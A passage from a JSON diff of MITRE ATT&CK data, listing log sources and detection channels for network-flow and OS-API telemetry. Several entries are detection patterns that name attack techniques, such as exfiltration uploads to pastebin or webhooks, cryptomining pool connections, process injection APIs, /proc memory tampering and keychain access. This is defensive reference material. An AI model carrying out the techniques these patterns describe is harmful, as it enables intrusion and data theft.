+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inter-segment traffic"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Long-lived or hijacked SSH sessions maintained with no active user activity"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "VPC/NSG flow logs for pod/instance egress to Internet or metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious outbound traffic from browser binary to non-standard domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abnormal browser traffic volume or destination"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound requests to domains not previously resolved or associated with phishing campaigns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to domains/IPs not previously resolved, occurring shortly after attachment download or link click"
+                        },
+                        {
+                            "name": "M365Defender:DeviceNetworkEvents",
+                            "channel": "NetworkConnection: bytes_sent >> bytes_received anomaly"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "outbound flows with bytes_out >> bytes_in"
+                        },
+                        {
+                            "name": "NSX:FlowLogs",
+                            "channel": "network_flow: bytes_out >> bytes_in to external"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/Zeek conn.log"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound data flows"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow records with entropy signatures resembling symmetric encryption"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "flow records"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "flow records"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTPS POST to known webhook URLs"
+                        },
+                        {
+                            "name": "saas:api",
+                            "channel": "Webhook registrations or repeated POST activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Source/destination IP translation inconsistent with intended policy"
+                        },
+                        {
+                            "name": "SNMP:DeviceLogs",
+                            "channel": "Unexpected NAT translation statistics or rule insertion events"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sudden spike in incoming flows to web service ports from single/multiple IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Unusual volume of inbound packets from single source across short time interval"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "port 5900 inbound"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP port 5900 open"
+                        },
+                        {
+                            "name": "NSM:firewall",
+                            "channel": "inbound connection to port 5900"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound connections to 139/445 to multiple destinations"
+                        },
+                        {
+                            "name": "VPCFlowLogs:All",
+                            "channel": "High volume internal traffic with low entropy indicating looped or malicious DoS script"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/sFlow/PCAP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound Network Flow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.network"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Device-to-Device Deployment Flows"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect syscalls"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound TCP/UDP traffic over unexpected port"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi service connections on unexpected ports"
+                        },
+                        {
+                            "name": "iptables:LOG",
+                            "channel": "OUTBOUND"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "tcp/udp"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "CLI network calls"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic from suspicious new processes post-attachment execution"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious anomalies in transmitted data integrity during application network operations"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "DNS resolution events leading to outbound traffic on unexpected ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to mining pools or proxies"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound flow logs to known mining pools"
+                        },
+                        {
+                            "name": "container:cni",
+                            "channel": "Outbound network traffic to mining proxies"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "TLS session established by ESXi service to unapproved endpoint"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session records with TLS-like byte patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTPS POST requests to pastebin.com or similar"
+                        },
+                        {
+                            "name": "NetFlow:Flow",
+                            "channel": "new outbound connections from exploited process tree"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "new connections from exploited lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected route changes or duplicate gateway advertisements"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall",
+                            "channel": "EventCode=2004, 2005, 2006"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Knock pattern: repeated REJ/S0 across \u2265MinSequenceLen ports from same src_ip then SF success."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Firewall/PF anchor load or rule change events."
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config/ACL changes, line vty transport input changes, telnet/ssh/http(s) enable, image/feature module changes."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to non-approved update hosts right after install/update"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New outbound flows to non-approved vendor hosts post install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New/rare egress to non-approved update hosts after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large outbound HTTPS uploads to repo domains"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS traffic to repository domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "alert log"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound flow records"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "NetworkConnection: high out:in ratio, periodic beacons, protocol mismatch"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "high out:in ratio or fixed-size periodic flows"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "network_flow: bytes_out >> bytes_in, fixed packet sizes/intervals to non-approved CIDRs"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect or sendto system call with burst pattern"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "sudden burst in outgoing packets from same PID"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "source instance sends large volume of traffic in short window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "session stats with bytes_out > bytes_in"
+                        },
+                        {
+                            "name": "NIDS:Flow",
+                            "channel": "session stats with bytes_out > bytes_in"
+                        },
+                        {
+                            "name": "esxi:vpxa",
+                            "channel": "connection attempts and data transmission logs"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "External traffic to remote access services"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High volumes of SYN/ACK packets with unacknowledged TCP handshakes"
+                        },
+                        {
+                            "name": "dns:query",
+                            "channel": "Outbound resolution to hidden service domains (e.g., `.onion`)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log + ssl.log with Tor fingerprinting"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "forwarded encrypted traffic"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Relayed session pathing (multi-hop)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound TCP SYN or UDP to multiple ports/hosts"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "container-level outbound traffic events"
+                        },
+                        {
+                            "name": "WLANLogs:Association",
+                            "channel": "Multiple APs advertising the same SSID but with different BSSID/MAC or encryption type"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "socket_events"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "ARP cache modification attempts observed through event tracing or security baselines"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Gratuitous ARP replies with mismatched IP-MAC binding"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ARP table updates inconsistent with expected gateway or DHCP lease assignments"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "networkd or com.apple.network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream 'eventMessage contains \"dns_request\"'"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "/var/log/syslog.log"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "CreateTrafficMirrorSession or ModifyTrafficMirrorTarget"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config change: CLI/NETCONF/SNMP \u2013 'monitor session', 'mirror port'"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound UDP floods targeting common reflection services with spoofed IP headers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound UDP spikes to external reflector IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large outbound UDP traffic to multiple public reflector IPs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "High entropy domain queries with multiple NXDOMAINs"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Frequent DNS queries with high entropy names or NXDOMAIN results"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "API communication"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound Connection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connection Tracking"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "pf firewall logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow Creation (NetFlow/sFlow)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, icmp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abnormal SMB authentication attempts correlated with poisoned LLMNR/NBT-NS sessions"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Gratuitous or duplicate DHCP OFFER packets from non-legitimate servers"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Inbound on ports 5985/5986"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Multiple IP addresses assigned to the same domain in rapid sequence"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Rapid domain-to-IP resolution changes for same domain"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Frequent DNS resolution of same domain with rotating IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "uncommon ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "alternate ports"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log or flow data"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "egress log analysis"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "egress logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High volume flows with incomplete TCP sessions or single-packet bursts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Knock pattern: multiple REJ/S0 to distinct closed ports then successful connection to service_port"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Firewall rule enable/disable or listen socket changes"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Config/ACL/line vty changes, service enable (telnet/ssh/http(s)), module reloads"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ioctl: Changes to wireless network interfaces (up, down, reassociate)"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: Historical list of associated SSIDs compared against baseline"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress from host after new install to unknown update endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to unknown registries/mirrors immediately after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress from app just installed to unknown update endpoints"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi processes relaying traffic via SSH or unexpected ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connection to mining pool port (3333, 4444, 5555)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to mining pool upon container launch"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow records with RSA key exchange on unexpected port"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connections from web server binaries (apache2, nginx, php-fpm) to unknown external IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "sustained outbound HTTPS sessions with high data volume"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections from IDE hosts to marketplace/tunnel domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound connections from IDE processes to marketplace/tunnel domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS outbound uploads"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network flows to external cloud services"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP port 22 traffic"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "port 22 access"
+                        },
+                        {
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected location resolution events or abnormal subscriber tracking requests"
+                        },
+                        {
+                            "name": "TelecomLogs:MobilityEvents",
+                            "channel": "Unexpected subscriber tracking or abnormal mobility/location resolution activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "App-attributed traffic exhibits multi-destination fan-out, sustained session bridging, or SOCKS-like relay behavior inconsistent with normal client-only mobile communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.777000+00:00\", \"old_value\": \"2026-04-09 17:32:30.362000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0078\", \"old_value\": \"https://attack.mitre.org/data-components/DC0078\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0021",
+                            "external_id": "DC0021"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "OS API Execution",
+                    "description": "Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Base",
+                            "channel": "GetLocaleInfoW, GetTimeZoneInformation API calls"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "GetMetadata, DescribeInstanceIdentity"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "open, execve: Unexpected processes accessing or modifying critical files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, ioctl"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API tracing / stack tracing via ETW or telemetry-based EDR"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "Behavioral API telemetry (GetProcAddress, LoadLibrary, VirtualAlloc)"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "aaa privilege_exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "APCQueueOperations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Invocation of SMLoginItemSetEnabled by non-system or recently installed application"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "flock|NSDistributedLock|FileHandle.*lockForWriting"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Directory-Services-SAM",
+                            "channel": "api_call: Calls to DsAddSidHistory or related RPC operations"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "application logs referencing NSTimer, sleep, or launchd delays"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "High-frequency or suspicious sequence of QueryPerformanceCounter/GetTickCount API calls from a non-standard process lineage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Rules capturing clock_gettime, time, gettimeofday syscalls when enabled"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Unexpected reload, crashinfo, or boot message not tied to scheduled maintenance"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-RPC",
+                            "channel": "rpc_call: srvsvc.NetShareEnum / NetShareEnumAll from non-admin or unusual processes"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smb_command: TreeConnectAndX to \\\\*\\IPC$ / srvsvc or Trans2/NT_CREATE for listing shares"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "API usage MFCreateDeviceSource, IAMStreamConfig, ICaptureGraphBuilder2, DirectShow filter graph creation from uncommon callers"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat/read/ioctl: openat/read/ioctl on /dev/video* by uncommon user/process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access decisions to kTCCServiceCamera for unexpected binaries"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "Objective\u2011C/Swift calls to AVCaptureDevice/AVCaptureSession by non-whitelisted processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mmap, ptrace, process_vm_writev or direct memory ops"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "API call to AddMonitor invoked by non-installer process"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Win32k",
+                            "channel": "SetWindowLong, SetClassLong, NtUserMessageCall, SendNotifyMessage, PostMessage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unshare, mount, keyctl, setns syscalls executed by containerized processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "audio APIs"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-COM/Operational",
+                            "channel": "CLSID activation events where ProcessName=mmc.exe and CLSID not in allowed baseline"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "com.apple.securityd, com.apple.tccd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "send, recv, write: Abnormal interception or alteration of transmitted data"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CALCULATE: Integrity validation of transmitted data via hash checks"
+                        },
+                        {
+                            "name": "ETW:Token",
+                            "channel": "token_analysis: API calls such as DuplicateTokenEx or ImpersonateLoggedOnUser"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API Calls"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-DotNETRuntime",
+                            "channel": "AssemblyLoad/ModuleLoad (Loader keyword) from Microsoft-Windows-DotNETRuntime"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "VirtualAlloc/VirtualProtect/MapViewOfFile indicators via stack/heap activity and ImageLoad"
+                        },
+                        {
+                            "name": "auditd:MMAP",
+                            "channel": "memory region with RWX permissions allocated"
+                        },
+                        {
+                            "name": "snmp:trap",
+                            "channel": "management queries"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "Describe* or List* API calls"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Win32k",
+                            "channel": "SendMessage, PostMessage, LVM_*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sudo or pkexec invocation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "authorization execute privilege requests"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "NtQueryInformationProcess"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "ptrace: Processes invoking ptrace with PTRACE_TRACEME flag"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Remote access API calls and file uploads"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Execution of modified binaries or abnormal library load sequences"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Calls to AuthorizationExecuteWithPrivileges() observed via Apple System Logger or security_auditing tools"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access or unlock attempt to keychain database"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of input detection APIs (e.g., CGEventSourceKeyState)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mount system call with bind or remap flags"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "Decrypt"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-File",
+                            "channel": "ZwSetEaFile or ZwQueryEaFile function calls"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "fork/clone/daemon syscall tracing"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Detached process execution with no associated parent"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, mmap, mprotect, open, dlopen"
+                        },
+                        {
+                            "name": "ETW:ProcThread",
+                            "channel": "api_call: CreateProcessWithTokenW, CreateProcessAsUserW"
+                        },
+                        {
+                            "name": "EDR:memory",
+                            "channel": "MemoryWriteToExecutable"
+                        },
+                        {
+                            "name": "ETW:Token",
+                            "channel": "api_call: DuplicateTokenEx, ImpersonateLoggedOnUser, SetThreadToken"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "api_call: UpdateProcThreadAttribute (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and CreateProcess* with EXTENDED_STARTUPINFO_PRESENT / StartupInfoEx"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Security-Auditing",
+                            "channel": "api_call: LogonUser(A|W), LsaLogonUser, SetThreadToken, ImpersonateLoggedOnUser"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "API calls"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "ptrace, mmap, process_vm_writev"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve of dd or sed targeting /proc/*/mem"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "CreateTransaction, CreateFileTransacted, RollbackTransaction, NtCreateProcessEx, NtCreateThreadEx"
+                        },
+                        {
+                            "name": "ETW",
+                            "channel": "Calls to GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "WriteProcessMemory: WriteProcessMemory targeting regions containing KernelCallbackTable addresses"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "SetFileTime"
+                        },
+                        {
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ACTION_VIEW redirect_uri handled by unexpected package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "wifiservice startScan / scanResults retrieved repeatedly or by unexpected package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "telephony cell info enumeration bursts (neighboring/all cell info) by package"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
